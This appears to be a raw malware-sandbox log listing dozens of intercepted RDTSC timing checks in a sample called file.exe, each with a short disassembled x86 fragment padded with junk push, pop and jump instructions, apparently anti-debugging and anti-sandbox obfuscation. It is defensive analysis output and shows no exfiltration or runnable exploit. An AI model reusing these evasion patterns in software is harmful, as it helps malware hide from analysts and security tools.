Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FA156 second address: 15FA1FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov eax, dword ptr [eax] 0x00000007 jnl 00007F9CD8F21B0Ah 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 jmp 00007F9CD8F21AFAh 0x00000016 pop eax 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F9CD8F21AF8h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 adc edx, 2FB13DDEh 0x00000037 call 00007F9CD8F21AF9h 0x0000003c jnc 00007F9CD8F21B0Eh 0x00000042 push eax 0x00000043 jng 00007F9CD8F21AFEh 0x00000049 jns 00007F9CD8F21AF8h 0x0000004f mov eax, dword ptr [esp+04h] 0x00000053 pushad 0x00000054 jmp 00007F9CD8F21AFBh 0x00000059 push eax 0x0000005a push edx 0x0000005b jnp 00007F9CD8F21AF6h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FA387 second address: 15FA38B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FA45C second address: 15FA460 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FA460 second address: 15FA466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FA466 second address: 15FA475 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FA475 second address: 15FA47C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FA47C second address: 15FA482 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FAD3C second address: 15FAD47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F9CD8E65986h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FAD47 second address: 15FAD94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F9CD8F21AF8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov ch, al 0x00000026 lea eax, dword ptr [ebp+124788CEh] 0x0000002c mov edx, dword ptr [ebp+122D2A2Ch] 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 push ecx 0x00000036 jmp 00007F9CD8F21AFCh 0x0000003b pop ecx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FAD94 second address: 15FADB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9CD8E65996h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FADB8 second address: 15FADBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FADBF second address: 15E0505 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E6598Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F9CD8E65995h 0x0000000f lea eax, dword ptr [ebp+1247888Ah] 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007F9CD8E65988h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f mov edi, 315EF995h 0x00000034 nop 0x00000035 jmp 00007F9CD8E65991h 0x0000003a push eax 0x0000003b jmp 00007F9CD8E6598Fh 0x00000040 nop 0x00000041 mov dword ptr [ebp+122D18C2h], edi 0x00000047 mov edx, dword ptr [ebp+122D3331h] 0x0000004d call dword ptr [ebp+122D2541h] 0x00000053 push eax 0x00000054 push edx 0x00000055 push ebx 0x00000056 pushad 0x00000057 popad 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 163E37F second address: 163E3B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F9CD8F21B08h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jnl 00007F9CD8F21AFCh 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 163E3B4 second address: 163E3B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 163E53F second address: 163E544 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 163E6AA second address: 163E6AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 163E6AE second address: 163E6BC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F9CD8F21AF6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 163E845 second address: 163E849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 163E849 second address: 163E84D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 163EAA7 second address: 163EACD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E6598Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jp 00007F9CD8E65992h 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 163ED77 second address: 163ED87 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9CD8F21AF8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15C3BF7 second address: 15C3BFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15C3BFB second address: 15C3C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15C3C06 second address: 15C3C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1641BD5 second address: 1641BEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9CD8F21AF6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1641BEB second address: 1641BEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1641BEF second address: 1641BF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1641D5E second address: 1641D8C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop esi 0x00000008 jmp 00007F9CD8E65994h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F9CD8E6598Eh 0x00000017 push edx 0x00000018 pop edx 0x00000019 jnc 00007F9CD8E65986h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1641D8C second address: 1641DAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9CD8F21AFDh 0x00000008 jmp 00007F9CD8F21AFEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1641F01 second address: 1641F08 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1642052 second address: 164205C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F9CD8F21AF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 164205C second address: 1642066 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9CD8E65986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1642066 second address: 164207C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9CD8F21B02h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 164207C second address: 1642080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1644840 second address: 1644851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9CD8F21AFDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1644851 second address: 1644872 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F9CD8E65994h 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1644872 second address: 1644877 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1644877 second address: 164487D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1646ADE second address: 1646AE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1646AE6 second address: 1646B15 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9CD8E65986h 0x00000008 jmp 00007F9CD8E65997h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F9CD8E65986h 0x00000017 jne 00007F9CD8E65986h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16481B8 second address: 16481BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16481BE second address: 16481C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15B9944 second address: 15B9964 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21B08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15B9964 second address: 15B9985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F9CD8E6598Ch 0x0000000b popad 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f jng 00007F9CD8E65986h 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15B9985 second address: 15B999A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9CD8F21B01h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15B999A second address: 15B999E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 164DB7D second address: 164DBC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21AFDh 0x00000007 jmp 00007F9CD8F21B05h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pop edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F9CD8F21B08h 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 164C773 second address: 164C779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FA83A second address: 15FA83E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FA83E second address: 15FA84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FA84B second address: 15FA852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FA907 second address: 15FA90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FA90C second address: 15FA922 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9CD8F21B02h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FA922 second address: 15FA926 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 164CD97 second address: 164CDB3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9CD8F21B02h 0x00000008 js 00007F9CD8F21AFCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 164CF04 second address: 164CF0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F9CD8E65986h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 164CF0E second address: 164CF14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 164D8FE second address: 164D916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9CD8E65994h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 164D916 second address: 164D92F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21AFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jc 00007F9CD8F21AF6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 164D92F second address: 164D93B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F9CD8E65986h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1650B1D second address: 1650B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15C05BA second address: 15C05CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jns 00007F9CD8E6598Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15C05CD second address: 15C05D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15C05D3 second address: 15C05ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65996h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1653FC3 second address: 1653FDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9CD8F21AFEh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1653FDC second address: 1653FE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1653FE0 second address: 1653FE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16543F0 second address: 16543F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16543F4 second address: 1654400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1654714 second address: 1654719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 165C295 second address: 165C29B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 165C29B second address: 165C2A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 165C2A1 second address: 165C2A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 165C2A5 second address: 165C2A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 165CFFD second address: 165D00D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9CD8F21AFBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 165D00D second address: 165D013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1661998 second address: 16619CA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9CD8F21B09h 0x00000008 jmp 00007F9CD8F21B01h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1660DAD second address: 1660DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1660F5D second address: 1660F68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1660F68 second address: 1660F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1660F6C second address: 1660F93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jp 00007F9CD8F21B3Ah 0x0000000d pushad 0x0000000e jmp 00007F9CD8F21B07h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1660F93 second address: 1660FB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F9CD8E65986h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9CD8E6598Fh 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1661501 second address: 1661514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9CD8F21AFDh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1666521 second address: 1666525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1666525 second address: 166653B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21AFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166E573 second address: 166E578 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166C59D second address: 166C5A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166C5A3 second address: 166C5C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65997h 0x00000007 je 00007F9CD8E6598Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166C9FF second address: 166CA30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9CD8F21B05h 0x0000000d push edx 0x0000000e jmp 00007F9CD8F21B01h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166CA30 second address: 166CA35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166CA35 second address: 166CA3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F9CD8F21AF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166CB71 second address: 166CB86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65991h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166CB86 second address: 166CB99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9CD8F21AFAh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166CE42 second address: 166CE5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F9CD8E65986h 0x0000000a pop ebx 0x0000000b jmp 00007F9CD8E6598Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D022 second address: 166D026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D026 second address: 166D02A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
